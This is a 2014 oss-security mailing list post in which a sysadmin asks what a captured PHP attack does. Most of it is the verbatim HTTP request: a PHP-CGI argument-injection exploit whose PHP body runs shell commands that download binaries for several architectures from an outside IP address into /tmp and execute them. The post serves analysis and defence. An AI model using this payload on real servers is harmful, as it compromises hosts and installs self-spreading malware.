|
Message-ID: <alpine.BSF.2.00.1410110621530.31844@aneurin.horsfall.org> Date: Sat, 11 Oct 2014 06:28:04 +1100 (EST) From: Dave Horsfall <dave@...sfall.org> To: OSS Security <oss-security@...ts.openwall.com> Subject: What does this PHP exploit do? My apologies if this is off-topic for this list, but out of all the security lists of which I am a member this seems to be the closest one that fits, so please point me to a more appropriate one in that case.. I'm trying to figure out what this exploit does; it started around the time that Shellshock did, but I don't think that they're related. It downloads binaries for several architectures (even a MIPS) which amongst other things futzes around with IPTABLES (including blocking the TELNET port) and appears to be self-reproducing. The hex-encoded stuff in the script below decodes to "-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n" but my PHP-fu doesn't quite extend that far (and that "safe_mode=off" looks a bit suss). Script below, kindly supplied by 0wned boxes the world over (in this case, Korea): POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (compatible; Zollard; Linux) Content-Type: application/x-www-form-urlencoded Content-Length: 1817 Connection: close <?php echo "Zollard"; $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); } function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://119.206.52.15:58455/armeabi;chmod +x /tmp/armeabi"); myshellexec("rm -rf /tmp/arm;wget -P /tmp http://119.206.52.15:58455/arm;chmod +x /tmp/arm"); myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://119.206.52.15:58455/ppc;chmod +x /tmp/ppc"); myshellexec("rm -rf /tmp/mips;wget -P /tmp http://119.206.52.15:58455/mips;chmod +x /tmp/mips"); myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://119.206.52.15:58455/mipsel;chmod +x /tmp/mipsel"); myshellexec("rm -rf /tmp/x86;wget -P /tmp http://119.206.52.15:58455/x86;chmod +x /tmp/x86"); myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://119.206.52.15:58455/nodes;chmod +x /tmp/nodes"); myshellexec("rm -rf /tmp/sig;wget -P /tmp http://119.206.52.15:58455/sig;chmod +x /tmp/sig"); myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;"); -- Dave
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.